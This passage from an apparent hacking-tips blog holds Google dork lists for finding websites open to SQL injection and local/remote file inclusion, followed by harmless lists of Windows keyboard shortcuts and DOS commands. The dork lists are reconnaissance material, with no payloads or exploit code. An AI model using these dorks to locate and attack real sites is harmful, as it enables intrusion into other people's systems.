/>inurl:viewphoto.php?id=<br />inurl:article.php?id=<br />inurl:erson.php?id=<br />inurlroductinfo.php?id=<br />inurl:showimg.php?id=<br />inurl:view.php?id=<br />inurl:website.php?id=<br />inurl:hosting_info.php?id=<br />inurl:gallery.php?id=<br />inurl:rub.php?idr=<br />inurl:view_faq.php?id=<br />inurl:artikelinfo.php?id=<br />inurl:detail.php?ID=<br />inurl:index.php?=<br />inurl:rofile_view.php?id=<br />inurl:category.php?id=<br />inurl:ublications.php?id=<br />inurl:fellows.php?id=<br />inurl:downloads_info.php?id=<br />inurl:rod_info.php?id=<br />inurl:shop.php?do=part&id=<br />inurl:roductinfo.php?id=<br />inurl:collectionitem.php?id=<br />inurl:band_info.php?id=<br />inurlroduct.php?id=<br />inurl:releases.php?id=<br />inurl:ray.php?id=<br />inurl:roduit.php?id=<br />inurlp.php?id=<br />inurl:shopping.php?id=<br />inurl:roductdetail.php?id=<br />inurlst.php?id=<br />inurl:viewshowdetail.php?id=<br />inurl:clubpage.php?id=<br />inurl:memberInfo.php?id=<br />inurl:section.php?id=<br />inurl:theme.php?id=<br />inurl:age.php?id=<br />inurl:shredder-categories.php?id=<br />inurl:tradeCategory.php?id=<br />inurl:roduct_ranges_view.php?ID=<br />inurl:shop_category.php?id=<br />inurl:transcript.php?id=<br />inurl:channel_id=<br />inurl:item_id=<br />inurl:newsid=<br />inurl:trainers.php?id=<br />inurl:news-full.php?id=<br />inurl:news_display.php?getid=<br />inurl:index2.php?option=<br />inurl:readnews.php?id=<br />inurl:top10.php?cat=<br />inurl:newsone.php?id=<br />inurl:event.php?id=<br />inurlroduct-item.php?id=<br />inurl:sql.php?id=<br />inurl:aboutbook.php?id=<br />inurl:review.php?id=<br />inurl:loadpsb.php?id=<br />inurl:ages.php?id=<br />inurl:material.php?id=<br />inurl:clanek.php4?id=<br />inurl:announce.php?id=<br />inurl:chappies.php?id=<br />inurl:read.php?id=<br />inurl:viewapp.php?id=<br />inurl:viewphoto.php?id=<br />inurl:rub.php?idr=<br />inurl:galeri_info.php?l=<br />inurl:review.php?id=<br />inurl:iniziativa.php?in=<br />inurl:curriculum.php?id=<br />inurl:labels.php?id=<br />inurl:story.php?id=<br />inurl:look.php?ID=<br />inurl:newsone.php?id=<br />inurl:aboutbook.php?id=<br />inurl:material.php?id=<br />inurlinions.php?id=<br />inurl:announce.php?id=<br />inurl:rub.php?idr=<br />inurl:galeri_info.php?l=<br />inurl:tekst.php?idt=<br />inurl:newscat.php?id=<br />inurl:newsticker_info.php?idn=<br />inurl:rubrika.php?idr=<br />inurl:rubp.php?idr=<br />inurl:ffer.php?idf=<br />inurl:art.php?idm=<br />inurl:title.php?id=</span></span></code><br /><div><br /></div></div></div></div></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com3tag:blogger.com,1999:blog-289744729559414161.post-60917003649723617602011-02-25T09:37:00.000-08:002011-06-27T20:13:52.749-07:00Advance Dorks For LFI & RFI<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: red;"><b>Remote File Inclusion/Local File Inclusion:</b></div><div style="margin: 5px 20px 20px;"> <pre class="alt2" dir="ltr" style="border: 1px inset; height: 258px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;">inurl:/_functions.php?prefix=<br /><br />inurl:/cpcommerce/_functions.php?prefix=<br /><br />inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=<br /><br />inurl:/modules/agendax/addevent.inc.php?agendax_path=<br /><br />inurl:/ashnews.php?pathtoashnews=<br /><br />inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=<br /><br />inurl:/pm/lib.inc.php?pm_path=<br /><br />inurl:/b2-tools/gm-2-b2.php?b2inc=<br /><br />inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=<br /><br />inurl:/modules/agendax/addevent.inc.php?agendax_path=<br /><br />inurl:/includes/include_once.php?include_file=<br /><br />inurl:/e107/e107_handlers/secure_img_render.php?p=<br /><br />inurl:/shoutbox/expanded.php?conf=<br /><br />inurl:/main.php?x=<br /><br />inurl:/myPHPCalendar/admin.php?cal_dir=<br /><br />inurl:/index.php/main.php?x=<br /><br />inurl:/index.php?include=<br /><br />inurl:/index.php?x=<br /><br />inurl:/index.php?open=<br /><br />inurl:/index.php?visualizar=<br /><br />inurl:/template.php?pagina=<br /><br />inurl:/index.php?pagina=<br /><br />inurl:/index.php?inc=<br /><br />inurl:/includes/include_onde.php?include_file=<br /><br />inurl:/index.php?page=<br /><br />inurl:/index.php?pg=<br /><br />inurl:/index.php?show=<br /><br />inurl:/index.php?cat=<br /><br />inurl:/index.php?file=<br /><br />inurl:/db.php?path_local=<br /><br />inurl:/index.php?site=<br /><br />inurl:/htmltonuke.php?filnavn=<br /><br />inurl:/livehelp/inc/pipe.php?HCL_path=<br /><br />inurl:/hcl/inc/pipe.php?HCL_path=<br /><br />inurl:/inc/pipe.php?HCL_path=<br /><br />inurl:/support/faq/inc/pipe.php?HCL_path=<br /><br />inurl:/help/faq/inc/pipe.php?HCL_path=<br /><br />inurl:/helpcenter/inc/pipe.php?HCL_path=<br /><br />inurl:/live-support/inc/pipe.php?HCL_path=<br /><br />inurl:/gnu3/index.php?doc=<br /><br />inurl:/gnu/index.php?doc=<br /><br />inurl:/phpgwapi/setup/tables_update.inc.php?appdir=<br /><br />inurl:/forum/install.php?phpbb_root_dir=<br /><br />inurl:/includes/calendar.php?phpc_root_path=<br /><br />inurl:/includes/setup.php?phpc_root_path=<br /><br />inurl:/inc/authform.inc.php?path_pre=<br /><br />inurl:/include/authform.inc.php?path_pre=<br /><br />inurl:index.php?nic=<br /><br />inurl:index.php?sec=<br /><br />inurl:index.php?content=<br /><br />inurl:index.php?link=<br /><br />inurl:index.php?filename=<br /><br />inurl:index.php?dir=<br /><br />inurl:index.php?document=<br /><br />inurl:index.php?view=<br /><br />inurl:*.php?sel=<br /><br />inurl:*.php?session=&content=<br /><br />inurl:*.php?locate=<br /><br />inurl:*.php?place=<br /><br />inurl:*.php?layout=<br /><br />inurl:*.php?go=<br /><br />inurl:*.php?catch=<br /><br />inurl:*.php?mode=<br /><br />inurl:*.php?name=<br /><br />inurl:*.php?loc=<br /><br />inurl:*.php?f=<br /><br />inurl:*.php?inf=<br /><br />inurl:*.php?pg=<br /><br />inurl:*.php?load=<br /><br />inurl:*.php?naam=<br /><br />allinurl:/index.php?page= site:*.ru<br /><br />allinurl:/index.php?file= site:*.ru</pre></div><br /><b><span style="color: red;">All INURL</span></b> :<br /><br /><br /><pre class="alt2" dir="ltr" style="border: 1px inset; height: 258px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;">/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=<br /><br />/includes/header.php?systempath=<br /><br />/Gallery/displayCategory.php?basepath=<br /><br />/index.inc.php?PATH_Includes=<br /><br />/ashnews.php?pathtoashnews=<br /><br />/ashheadlines.php?pathtoashnews=<br /><br />/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br /><br />/demo/includes/init.php?user_inc=<br /><br />/jaf/index.php?show=<br /><br />/inc/shows.inc.php?cutepath=<br /><br />/poll/admin/common.inc.php?base_path=<br /><br />/pollvote/pollvote.php?pollname=<br /><br />/sources/post.php?fil_config=<br /><br />/modules/My_eGallery/public/displayCategory.php?basepath=<br /><br />/bb_lib/checkdb.inc.php?libpach=<br /><br />/include/livre_include.php?no_connect=lol&chem_absolu=<br /><br />/index.php?from_market=Y&pageurl=<br /><br />/modules/mod_mainmenu.php?mosConfig_absolute_path=<br /><br />/pivot/modules/module_db.php?pivot_path=<br /><br />/modules/4nAlbum/public/displayCategory.php?basepath=<br /><br />/derniers_commentaires.php?rep=<br /><br />/modules/coppermine/themes/default/theme.php?THEME_DIR=<br /><br />/modules/coppermine/include/init.inc.php?CPG_M_DIR=<br /><br />/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=<br /><br />/coppermine/themes/maze/theme.php?THEME_DIR=<br /><br />/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=<br /><br />/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=<br /><br />/myPHPCalendar/admin.php?cal_dir=<br /><br />/agendax/addevent.inc.php?agendax_path=<br /><br />/modules/mod_mainmenu.php?mosConfig_absolute_path=<br /><br />/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=<br /><br />/main.php?page=<br /><br />/default.php?page=<br /><br />/index.php?action=<br /><br />/index1.php?p=<br /><br />/index2.php?x=<br /><br />/index2.php?content=<br /><br />/index.php?conteudo=<br /><br />/index.php?cat=<br /><br />/include/new-visitor.inc.php?lvc_include_dir=<br /><br />/modules/agendax/addevent.inc.php?agendax_path=<br /><br />/shoutbox/expanded.php?conf=<br /><br />/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br /><br />/pivot/modules/module_db.php?pivot_path=<br /><br />/library/editor/editor.php?root=<br /><br />/library/lib.php?root=<br /><br />/e107/e107_handlers/secure_img_render.php?p=<br /><br />/zentrack/index.php?configFile=<br /><br />/main.php?x=<br /><br />/becommunity/community/index.php?pageurl=<br /><br />/GradeMap/index.php?page=<br /><br />/index4.php?body=<br /><br />/side/index.php?side=<br /><br />/main.php?page=<br /><br />/es/index.php?action=<br /><br />/index.php?sec=<br /><br />/index.php?main=<br /><br />/index.php?sec=<br /><br />/index.php?menu=<br /><br />/html/page.php?page=<br /><br />/page.php?view=<br /><br />/index.php?menu=<br /><br />/main.php?view=<br /><br />/index.php?page=<br /><br />/content.php?page=<br /><br />/main.php?page=<br /><br />/index.php?x=<br /><br />/main_site.php?page=<br /><br />/index.php?L2=<br /><br />/content.php?page=<br /><br />/main.php?page=<br /><br />/index.php?x=<br /><br />/main_site.php?page=<br /><br />/index.php?L2=<br /><br />/index.php?show=<br /><br />/tutorials/print.php?page=<br /><br />/index.php?page=<br /><br />/index.php?level=<br /><br />/index.php?file=<br /><br />/index.php?inter_url=<br /><br />/index.php?page=<br /><br />/index2.php?menu=<br /><br />/index.php?level=<br /><br />/index1.php?main=<br /><br />/index1.php?nav=<br /><br />/index1.php?link=<br /><br />/index2.php?page=<br /><br />/index.php?myContent=<br /><br />/index.php?TWC=<br /><br />/index.php?sec=<br /><br />/index1.php?main=<br /><br />/index2.php?page=<br /><br />/index.php?babInstallPath=<br /><br />/main.php?body=<br /><br />/index.php?z=<br /><br />/main.php?view=<br /><br />/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=<br /><br />/index.php?file=<br /><br />/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=</pre><br /><span style="color: red; font-size: large;"><b>LFI :</b></span> <br /><pre class="alt2" dir="ltr" style="border: 1px inset; height: 258px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;">acion=<br />act=<br />action=<br />API_HOME_DIR=<br />board=<br />cat=<br />client_id=<br />cmd=<br />cont=<br />current_frame=<br />date=<br />detail=<br />dir=<br />display=<br />download=<br />f=<br />file=<br />fileinclude=<br />filename=<br />firm_id=<br />g=<br />getdata=<br />go=<br />HT=<br />idd=<br />inc=<br />incfile=<br />incl=<br />include_file=<br />include_path=<br />infile=<br />info=<br />ir=<br />lang=<br />language=<br />link=<br />load=<br />main=<br />mainspot=<br />msg=<br />num=<br />openfile=<br />p=<br />page=<br />pagina=<br />path=<br />path_to_calendar=<br />pg=<br />plik<br />qry_str=<br />ruta=<br />safehtml=<br />section=<br />showfile=<br />side=<br />site_id=<br />skin=<br />static=<br />str=<br />strona=<br />sub=<br />tresc=<br />url=<br />user=</pre></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-60824489598549839632011-02-25T07:05:00.000-08:002011-06-27T20:13:52.749-07:00All keyboard Shortcuts<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="border-collapse: separate; color: black; font-family: 'Times New Roman'; font-size: small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span class="Apple-style-span" style="color: #333333; font-family: Verdana,sans-serif; font-size: 13px; line-height: 19px; text-align: left;"><strong><span style="font-family: arial;">1.) Windows Hotkeys<br />Shift + F10 right-clicks.<br />Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.<br />Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.<br />Win + Control + F: Open Find dialog. (Computers)<br />Win + U: Open Utility Manager.<br />Win + F1: Open Windows help.<br />Win + Pause: Open System Properties dialog.<br />Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.<br />Win + Shift + Tab: Cycle through taskbar buttons in reverse.<br />Alt + Tab: Display CoolSwitch. More commonly known as the AltTab dialog.<br />Alt + Shift + Tab: Display CoolSwitch; go in reverse.<br />Alt + Escape: Send active window to the bottom of the z-order.<br />Alt + Shift + Escape: Activate the window at the bottom of the z-order.<br />Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.<br />Shift while a CD is loading: Bypass AutoPlay.<br />Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)<br />Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.<br />Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.<br />Printscreen: Copy screenshot of current screen to clipboard.<br />Alt + Printscreen: Copy screenshot of current active window to clipboard.<br />Ctrl + Alt + Down Arrow: Invert screen. Untested on OSes other than XP.<br />Ctrl + Alt + Up Arrow: Undo inversion.<br />Win + B : Move focus to systray icons.<br /><br />2.) Generic<br />Ctrl + C or Ctrl + Insert: Copy.<br />Ctrl + X or Shift + Delete: Cut.<br />Ctrl + V or Shift + Insert: Paste/Move.<br />Ctrl + N: New... File, Tab, Entry, etc.<br />Ctrl + S: Save.<br />Ctrl + O: Open...<br />Ctrl + P: Print.<br />Ctrl + Z: Undo.<br />Ctrl + A: Select all.<br />Ctrl + F: Find...<br />Ctrl+W : to close the current window<br />Ctrl + F4: Close tab or child window.<br />F1: Open help.<br />F11: Toggle full screen mode.<br />Alt or F10: Activate menu bar.<br />Alt + Space: Display system menu. Same as clicking the icon on the titlebar.<br />Escape: Remove focus from current control/menu, or close dialog box.<br /><br />3.) Generic Navigation<br />Tab: Forward one item.<br />Shift + Tab: Backward one item.<br />Ctrl + Tab: Cycle through tabs/child windows.<br />Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.<br />Enter: If a button's selected, click it, otherwise, click default button.<br />Space: Toggle items such as radio buttons or checkboxes.<br />Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.<br />Ctrl + Left: Move cursor to the beginning of previous word.<br />Ctrl + Right: Move cursor to the beginning of next word.<br />Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in RichEdit controls.<br />Ctrl + Down: Move cursor to beginning of next paragraph.<br />Shift + Left: Highlight one character to the left.<br />Shift + Right: Highlight one character to the right.<br />Shift + Up: Highlight from current cursor position, to one line up.<br />Shift + Down: Highlight from current cursor position, to one line down.<br />Ctrl + Shift + Left: Highlight to beginning of previous word.<br />Ctrl + Shift + Right: Highlight to beginning of next word.<br />Ctrl + Shift + Up: Highlight to beginning of previous paragraph.<br />Ctrl + Shift + Down: Highlight to beginning of next paragraph.<br />Home: Move cursor to top of a scrollable control.<br />End: Move cursor to bottom of a scrollable control.<br /><br />4.) Generic File Browser<br />Arrow Keys: Navigate.<br />Shift + Arrow Keys: Select multiple items.<br />Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.<br />(Letter): Select first found item that begins with (Letter).<br />BackSpace: Go up one level to the parent directory.<br />Alt + Left: Go back one folder.<br />Alt + Right: Go forward one folder.<br />Enter: Activate (Double-click) selected item(s).<br />Alt + Enter: View properties for selected item.<br />F2: Rename selected item(s).<br />Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.<br />Delete: Delete selected item(s).<br />Shift + Delete: Delete selected item(s); bypass Recycle Bin.<br />Ctrl while dragging item(s): Copy.<br />Ctrl + Shift while dragging item(s): Create shortcut(s).<br />In tree pane, if any:<br />Left: Collapse the current selection if expanded, or select the parent folder.<br />Right: Expand the current selection if collapsed, or select the first subfolder.<br />NumpadAsterisk: Expand currently selected directory and all subdirectories. No undo.<br />NumpadPlus: Expand currently selected directory.<br />NumpadMinus: Collapse currently selected directory.<br /><br />5.) Accessibility<br />Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.<br />Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.<br />Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.<br />NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.<br />Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.<br />6.) Microsoft Natural Keyboard with IntelliType Software Installed<br />Win + L: Log off Windows.<br />Win + P: Open Print Manager.<br />Win + C: Open control panel.<br />Win + V: Open clipboard.<br />Win + K: Open keyboard properties.<br />Win + I: Open mouse properties.<br />Win + A: Open Accessibility properties.<br />Win + Space: Displays the list of Microsoft IntelliType shortcut keys.<br />Win + S: Toggle CapsLock on and off.<br /><br />7.) Remote Desktop Connection Navigation<br /><br /><br /><br />Ctrl + Alt + End: Open the NT Security dialog.<br />Alt + PageUp: Switch between programs.<br />Alt + PageDown: Switch between programs in reverse.<br />Alt + Insert: Cycle through the programs in most recently used order.<br />Alt + Home: Display start menu.<br />Ctrl + Alt + Break: Switch the client computer between a window and a full screen.<br />Alt + Delete: Display the Windows menu.<br />Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.<br />Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.<br /><br />8.) Mozilla Firefox Shortcuts<br />Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.<br />Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.<br />Ctrl + (1-9): Switch to tab corresponding to number.<br />Ctrl + N: New window.<br />Ctrl + T: New tab.<br />Ctrl + L or Alt + D or F6: Switch focus to location bar.<br />Ctrl + Enter: Open location in new tab.<br />Shift + Enter: Open location in new window.<br />Ctrl + K or Ctrl + E: Switch focus to search bar.<br />Ctrl + O: Open a local file.<br />Ctrl + W: Close tab, or window if there's only one tab open.<br />Ctrl + Shift + W: Close window.<br />Ctrl + S: Save page as a local file.<br />Ctrl + P: Print page.<br />Ctrl + F or F3: Open find toolbar.<br />Ctrl + G or F3: Find next...<br />Ctrl + Shift + G or Shift + F3: Find previous...<br />Ctrl + B or Ctrl + I: Open Bookmarks sidebar.<br />Ctrl + H: Open History sidebar.<br />Escape: Stop loading page.<br />Ctrl + R or F5: Reload current page.<br />Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.<br />Ctrl + U: View page source.<br />Ctrl + D: Bookmark current page.<br />Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.<br />Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.<br />Ctrl + Numpad0 or Ctrl + 0: Set text size to default.<br />Alt + Left or Backspace: Back.<br />Alt + Right or Shift + Backspace: Forward.<br />Alt + Home: Open home page.<br />Ctrl + M: Open new message in integrated mail client.<br />Ctrl + J: Open Downloads dialog.<br />F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.<br />Shift + F6: Switch to previous frame.<br />Apostrophe ('): Find link as you type.<br />Slash (/): Find text as you type.<br /><br />9.) GMail<br />Note: Must have "keyboard shortcuts" on in settings.<br />C: Compose new message.<br />Shift + C: Open new window to compose new message.<br />Slash (/): Switch focus to search box.<br />K: Switch focus to the next most recent email. Enter or "O" opens focused email.<br />J: Switch focus to the next oldest email.<br />N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.<br />P: Switch focus to the previous message.<br />U: Takes you back to the inbox and checks for new mail.<br />Y: Various actions depending on current view:<br />Has no effect in "Sent" and "All Mail" views.<br />Inbox: Archive email or message.<br />Starred: Unstar email or message.<br />Spam: Unmark as spam and move back to "Inbox."<br />Trash: Move back to "Inbox."<br />Any label: Remove the label.<br />X: "Check" an email. Various actions can be performed against all checked emails.<br />S: "Star" an email. Identical to the more familiar term, "flagging."<br />R: Reply to the email.<br />A: Reply to all recipients of the email.<br />F: Forward an email.<br />Shift + R: Reply to the email in a new window.<br />Shift + A: Reply to all recipients of the email in a new window.<br />Shift + F: Forward an email in a new window.<br />Shift + 1 (!): Mark an email as spam and remove it from the inbox.<br />G then I: Switch to "Inbox" view.<br />G then S: Switch to "Starred" view.<br />G then A: Switch to "All Mail" view.<br />G then C: Switch to "Contacts" view.<br />G then S: Switch to "Drafts" view.<br /><br /><br />10.) List of F1-F9 Key Commands for the Command Prompt<br /><br />F1 / right arrow: Repeats the letters of the last command line, one by one.<br />F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line<br />F3: Repeats the last command line<br />F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line<br />F5: Goes back one command line<br />F6: Enters the traditional CTRL+Z (^z)<br />F7: Displays a menu with the command line history<br />F8: Cycles back through previous command lines (beginning with most recent)<br />F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.<br />Alt+Enter: toggle fullScreen mode.<br />up/down: scroll thru/repeat previous entries<br />Esc: delete line<br />Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.<br /><br /><br />1.Help</span></strong></span></span><br /><span class="Apple-style-span" style="border-collapse: separate; color: black; font-family: 'Times New Roman'; font-size: small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span class="Apple-style-span" style="color: #333333; font-family: Verdana,sans-serif; font-size: 13px; line-height: 19px; text-align: left;"><strong><span style="font-family: arial;">2. F2 Rename an item<br />3. F3 Open files<br />4. ALT+F4 Close window or quit program<br />5. F10 Activate the menu bar in a program<br />6. CTRL+ ESC open start menu, use the arrow keys to select an item, or TAB to select the taskbar<br />7. ALT+ TAB Return to previous program, or hold down the ALT key while repeatedly pressing tab to cycle through open programs<br />8. SHIFT+ DEL delete items permanently without sending to recycle bin<br />9. CTRL+ A Highlight all the items in window<br />10. CTRL+ C Copy<br />11. CTRL+ X Cut<br />12. CTRL+ V Paste<br />13. CTRL+ Z Undo<br />14. CTRL+ Y Redo<br />FOR INTERNET EXPLORER AND NETSCAPE<br />15. Home Jumps to the beginning of the page<br />16. END Jumps to the end of the page<br />17. ESC Stops the current page from loading<br />18. F11 Toggles full screen view<br />19. ALT+ LEFT ARROW Goes back to the previous page<br />20. ALT+ RIGHT ARROW Goes forward to the next page<br />21. ALT+ Home Goes to your Home page<br />22. CTRL+ N Opens a new browser window<br />23. CTRL+ W Closes the active window<br />24. CTRL+ O Opens the address book<br />25. CTRL+ R Reloads the current page<br />26. CTRL+ B Opens the Organized Favorites or Bookmarks windows<br />27. CTRL+ D Add the current page to your Favorites or Bookmarks<br />28. CTRL+ H Opens the history folder<br />29. CTRL+ F Finds text on the current page<br /><br /><br />CONTROL OVER A TO Z<br />One of the keys whose importance may have gone unnoticed by most of us is the Control key (Ctrl). The Control key in combination with the 26 alphabet keys can make a lot of our work easier than we think. The following pair of keys can come in handy when we want tasks faster than while using the mouse.<br />Operations that can be performed on the text selected:-<br />30. CTRL+ A Select all<br />31. CTRL+ B Bold<br />32. CTRL+ C Copy<br />33. CTRL+ E Justify center<br />34. CTRL+ I Italics<br />35. CTRL+ J Justify full<br />36. CTRL+ L Justify Left<br />37. CTRL+ M Indent<br />38. CTRL+ Q Remove paragraph Formatting<br />39. CTRL+ R Justify right<br />40. CTRL+ T Margin release<br />41. CTRL+ U Underline<br />These keys combos can be used to do other operations:-<br />42. CTRL+ D Opens Font Dialog Box<br />43. CTRL+ F Find<br />44. CTRL+ G Go to page, section, line, heading etc<br />45. CTRL+ H Find and replace<br />46. CTRL+ K Insert Hyperlink<br />47. CTRL+ N Open a new document<br />48. CTRL+ O Open an existing document<br />49. CTRL+ S Save<br />50 CTRL+ W Close an existing document<br />51. CTRL+ Y Redo<br />52. CTRL+ Z Undo<br />Besides the alphabet keys, a combination of other keys also helps:-<br />53. CTRL+ LEFT ARROW Jumps one word left<br />54. CTRL+ RIGHT ARROW Jumps one word right<br />55. CTRL+ DOWN ARROW Jumps one para down<br />56. CTRL+ UP ARROW Jumps one para up<br />57. CTRL+ BACKSPACE Delete one word left<br />58. CTRL+ DELETE Delete one word right<br />59. CTRL+ PAGE UP To the beginning of the previous page<br />60. CTRL+ PAGE DOWN to the beginning of the next page<br />61. CTRL+ P Print Dialog box</span></strong></span></span></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-42361423580753437192011-02-25T06:54:00.000-08:002011-06-27T20:13:52.750-07:00All Dos Commands<div dir="ltr" style="text-align: left;" trbidi="on"><span style="font-size: small;">ADDUSERS Add or list users to/from a CSV file<br />ARP Address Resolution Protocol<br />ASSOC Change file extension associations<br />ASSOCIAT One step file association<br />AT Schedule a command to run at a later time<br />ATTRIB Change file attributes<br /><br />BOOTCFG Edit Windows boot settings<br />BROWSTAT Get domain, browser and PDC info<br /><br />CACLS Change file permissions<br />CALL Call one batch program from another<br />CD Change Directory - move to a specific Folder<br />CHANGE Change Terminal Server Session properties<br />CHKDSK Check Disk - check and repair disk problems<br />CHKNTFS Check the NTFS file system<br />CHOICE Accept keyboard input to a batch file<br />CIPHER Encrypt or Decrypt files/folders<br />CleanMgr Automated cleanup of Temp files, recycle bin<br />CLEARMEM Clear memory leaks<br />CLIP Copy STDIN to the Windows clipboard.<br />CLS Clear the screen<br />CLUSTER Windows Clustering<br />CMD Start a new CMD shell<br />COLOR Change colors of the CMD window<br />COMP Compare the contents of two files or sets of files<br />COMPACT Compress files or folders on an NTFS partition<br />COMPRESS Compress individual files on an NTFS partition<br />CON2PRT Connect or disconnect a Printer<br />CONVERT Convert a FAT drive to NTFS.<br />COPY Copy one or more files to another location<br />CSVDE Import or Export Active Directory data<br /><br />DATE Display or set the date<br />Dcomcnfg DCOM Configuration Utility<br />DEFRAG Defragment hard drive<br />DEL Delete one or more files<br />DELPROF Delete NT user profiles<br />DELTREE Delete a folder and all subfolders<br />DevCon Device Manager Command Line Utility<br />DIR Display a list of files and folders<br />DIRUSE Display disk usage<br />DISKCOMP Compare the contents of two floppy disks<br />DISKCOPY Copy the contents of one floppy disk to another<br />DNSSTAT DNS Statistics<br />DOSKEY Edit command line, recall commands, and create macros<br />DSADD Add user (computer, group..) to active directory<br />DSQUERY List items in active directory<br />DSMOD Modify user (computer, group..) in active directory<br /><br />ECHO Display message on screen<br />ENDLOCAL End localisation of environment changes in a batch file<br />ERASE Delete one or more files<br />EXIT Quit the CMD shell<br />EXPAND Uncompress files<br />EXTRACT Uncompress CAB files<br /><br />FC Compare two files<br />FDISK Disk Format and partition<br />FIND Search for a text string in a file<br />FINDSTR Search for strings in files<br />FOR Conditionally perform a command several times<br />FORFILES Batch process multiple files<br />FORMAT Format a disk<br />FREEDISK Check free disk space (in bytes)<br />FSUTIL File and Volume utilities<br />FTP File Transfer Protocol<br />FTYPE Display or modify file types used in file extension associations<br /><br />GLOBAL Display membership of global groups<br />GOTO Direct a batch program to jump to a labelled line<br /><br />HELP Online Help<br />HFNETCHK Network Security Hotfix Checker<br /><br />IF Conditionally perform a command<br />IFMEMBER Is the current user in an NT Workgroup<br />IPCONFIG Configure IP<br /><br />KILL Remove a program from memory<br /><br />LABEL Edit a disk label<br />LOCAL Display membership of local groups<br />LOGEVENT Write text to the NT event viewer.<br />LOGOFF Log a user off<br />LOGTIME Log the date and time in a file<br /><br />MAPISEND Send email from the command line<br />MEM Display memory usage<br />MD Create new folders<br />MODE Configure a system device<br />MORE Display output, one screen at a time<br />MOUNTVOL Manage a volume mount point<br />MOVE Move files from one folder to another<br />MOVEUSER Move a user from one domain to another<br />MSG Send a message<br />MSIEXEC Microsoft Windows Installer<br />MSINFO Windows NT diagnostics<br />MSTSC Terminal Server Connection (Remote Desktop Protocol)<br />MUNGE Find and Replace text within file(s)<br />MV Copy in-use files<br /><br />NET Manage network resources<br />NETDOM Domain Manager<br />NETSH Configure network protocols<br />NETSVC Command-line Service Controller<br />NBTSTAT Display networking statistics (NetBIOS over TCP/IP)<br />NETSTAT Display networking statistics (TCP/IP)<br />NOW Display the current Date and Time<br />NSLOOKUP Name server lookup<br />NTBACKUP Backup folders to tape<br />NTRIGHTS Edit user account rights<br /><br />PATH Display or set a search path for executable files<br />PATHPING Trace route plus network latency and packet loss<br />PAUSE Suspend processing of a batch file and display a message<br />PERMS Show permissions for a user<br />PERFMON Performance Monitor<br />PING Test a network connection<br />POPD Restore the previous value of the current directory saved by PUSHD<br />PORTQRY Display the status of ports and services<br />PRINT Print a text file<br />PRNCNFG Display, configure or rename a printer<br />PRNMNGR Add, delete, list printers set the default printer<br />PROMPT Change the command prompt<br />PsExec Execute process remotely<br />PsFile Show files opened remotely<br />PsGetSid Display the SID of a computer or a user<br />PsInfo List information about a system<br />PsKill Kill processes by name or process ID<br />PsList List detailed information about processes<br />PsLoggedOn Who's logged on 